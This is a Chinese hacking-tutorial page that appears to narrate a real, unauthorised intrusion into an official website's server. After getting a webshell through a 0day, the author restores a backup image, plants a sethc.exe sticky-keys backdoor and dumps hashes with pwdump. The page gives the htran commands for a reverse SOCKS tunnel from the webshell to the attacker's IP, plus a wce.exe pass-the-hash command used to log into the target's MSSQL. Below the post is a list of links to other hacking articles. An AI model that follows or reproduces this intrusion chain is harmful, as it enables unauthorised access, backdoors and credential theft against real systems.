黑客:入侵进级教程 - xx官网的渗透步骤
发布时间:2012-01-17 13:34:07作者:知识屋
某官网的渗透笔记,挖掘的某0DAY拿到webshell,USER权限,联通外网,提权SYSTEM的EXP无效,看来打的补丁很全,服务器用的 是微软FTP,MSSQL,没啥突破口。路过其他盘,发现一个小有年份的BKF文件,貌似这个是用于系统的恢复和还原的.复制到WEB 目录下回来。装个虚拟机还原BKF文件。虚拟机就变成目标主机的系统了。没有密码登陆不进去了。插入WINPE光盘,替换sethc.exe ,做个shift后门,按5次shift进入主机,再新建一个帐号登陆。用pwdump抓hash,不幸的是ophcrack 没跑出来,既然有目标主机的hash了。转换下思路。
本地执行htran -s -listen 1234 8080
webshell执行htran -s -connect 本机IP 1234
得到一条8080的SOCK5代理
本地设置ProxyCap允许所有程序通过此代理连接,然后
wce.exe -s administrator EVIL:25E42477F38A0E69181747D7808C7C1E:32F081A735766AD4CA68B15F6612CD7C 替换HASH
打开SQL Server 管理器,填写目标IP,选择WINDOWS认证,OK,成功登陆目标的SQL。接下来SQL提权。不多说了。
(免责声明:文章内容如涉及作品内容、版权和其它问题,请及时与我们联系,我们将在第一时间删除内容,文章内容仅供参考)
相关知识
软件推荐
更多 >
-
1
教你把书上的字快速弄到电脑上2011-07-02
-
2
黑客基础教程之如何查看论坛隐藏贴(怎么查看论坛隐藏贴)
-
3
一个黑客所需的基本技能
-
4
黑客基础教程之如何查看电脑配置(怎么查看自己的电脑配置)
-
5
怎么取消开机密码
-
6
什么是肉鸡,如何避免电脑成为肉鸡?
-
7
一名初级黑客所必须掌握的基本技能
-
8
电脑常见安全隐患,你知道吗?
-
9
黑客基础教程之黑客入侵渗透教程
-
10
【注意】QQ密码本地破解的原理和方法
